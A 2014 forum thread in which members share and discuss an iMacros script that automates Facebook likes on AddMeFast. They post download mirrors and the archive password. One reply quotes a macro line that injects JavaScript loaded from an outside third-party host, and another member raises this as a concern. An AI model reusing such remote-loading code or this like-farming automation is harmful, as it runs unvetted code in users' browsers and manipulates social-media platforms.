76.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

09-30-2014, 10:21 AM
RE:
Thanks bro !
09-30-2014, 12:43 PM (This post was last modified: 09-30-2014 12:45 PM by Leecherboy.)
RE: [GET] Addmefast Facebook Likes Script Working 29/9/2014 - Original Share
(09-30-2014 09:27 AM)Metalpriest Wrote:  
(09-30-2014 04:36 AM)Puppy Wrote:  
(09-30-2014 12:06 AM)Metalpriest Wrote:  Hey BBHF fellow members! Here is an AddMeFast script written myself for Facebook likes. Be sure to add some +reps as a token of appreciation! Cool Cool

Download: http://mir.cr/0QGISHHA

Reason I added Refresh before every loop in the code is because I have encountered AddMeFast throwing up a "No more items in this network" error intermittently. Not sure if anyone else has come through it.

Have a nice day!! Cool Cool Cool Cool

Please comment if not working.
Copy and past like a monster, good way to earn +REP.
But imacros is actually simple txt code and you have:
"GOTO=j(function(){document.body.appendChild(document.createElement('script')).src='htt​p://social.tienganhratde.com/js.php?file=amf-fb-like-page';})();"
If it is your personal code, why do you have link to:
social.tienganhratde.com???
It was a old code that was shared before (around April 2013) didn't work, so I modified it. Next time please do not jump to such conclusions. Good day friend!
Thanks a lot Metal. Some people just keep b*tching about this and that without even thinking (surprised it's coming from a VIP member). Nevertheless, thanks for the share, and just ignore such people. Good that you added refresh to each loop since even I have encountered the no more items error at which other macros simply wait till the loop ends. +6 reps
10-01-2014, 07:52 AM
RE:
What is the password?
10-01-2014, 08:02 AM
RE:
How to downloud?Pas is not best......
10-01-2014, 05:47 PM
(09-30-2014 12:06 AM)Metalpriest Wrote:  Hey BBHF fellow members! Here is an AddMeFast script written myself for Facebook likes. Be sure to add some +reps as a token of appreciation! Cool Cool

Reason I added Refresh before every loop in the code is because I have encountered AddMeFast throwing up a "No more items in this network" error intermittently. Not sure if anyone else has come through it.

"GOTO=j(function(){document.body.appendChild(document.createElement('script')).src='htt​p://social.tienganhratde.com/js.php?file=amf-fb-like-page';})();"
It was a old code that was shared before (around April 2013) didn't work, so I modified it. Next time please do not jump to such conclusions. Good day friend!
Nobody starts from scratch anymore except old-school programmers from the 70's. I love re-writing stuff that doesn't work and making it work better than before.

In fact that just gave me an idea. I've got a lot of software from 2005 written mostly with C++ some Visual Basic . Should I share them here? They all work but need updating and I have legal rights to all the source code so there's no problem there. I'm new here so what do you think? Thanks!
21.gif
*BBHF NEW PRIVATE TORRENT PROJECT* Join HERE
10-01-2014, 06:02 PM
RE:
zippyshare mirror http://www19.zippyshare.com/v/90805586/file.html
10-01-2014, 06:35 PM (This post was last modified: 10-01-2014 06:36 PM by Leecherboy.)
Password: bestblackhatforum.com
10-01-2014, 06:37 PM (This post was last modified: 10-01-2014 06:48 PM by Metalpriest.)
(10-01-2014 05:47 PM)kitty Wrote:  

Nobody starts from scratch anymore except old-school programmers from the 70's. I love re-writing stuff that doesn't work and making it work better than before.

In fact that just gave me an idea. I've got a lot of software from 2005 written mostly with C++ some Visual Basic . Should I share them here? They all work but need updating and I have legal rights to all the source code so there's no problem there. I'm new here so what do you think? Thanks!
Sir/ma'am, you are free to do whatver you please, as long as the solution works without problems. There was a major rewrite of the old code macro, and if you need I will link to the old one. Thanks, and have a nice day.

(09-30-2014 01:47 AM)falkuto Wrote:  Please upload to other server, zippyshare or Mediafire please, i dont download :(
Uploaded to zippyshare too.

(10-01-2014 08:02 AM)musicpirate Wrote:  How to downloud?Pas is not best......
Pass removed now. The pass will always be bestblackhatforum.com
[Image: 728x90-1.jpg]
10-02-2014, 08:21 PM
(10-01-2014 06:37 PM)Metalpriest Wrote:  
(10-01-2014 05:47 PM)kitty Wrote:  

Sir/ma'am, you are free to do whatver you please, as long as the solution works without problems. There was a major rewrite of the old code macro, and if you need I will link to the old one. Thanks, and have a nice day.

(09-30-2014 01:47 AM)falkuto Wrote:  Please upload to other server, zippyshare or Mediafire please, i dont download :(
Uploaded to zippyshare too.

(10-01-2014 08:02 AM)musicpirate Wrote:  How to downloud?Pas is not best......
Pass removed now. The pass will always be bestblackhatforum.com
Hi, Thanks for your sharing, could you please tell me the way to use this tool? i am already on addmefast aslo using imacros but still dont knw how to use it. please guide me. thanks in advance.
10-02-2014, 09:28 PM
RE:
Great it works . Thank you
69.gif

60.gif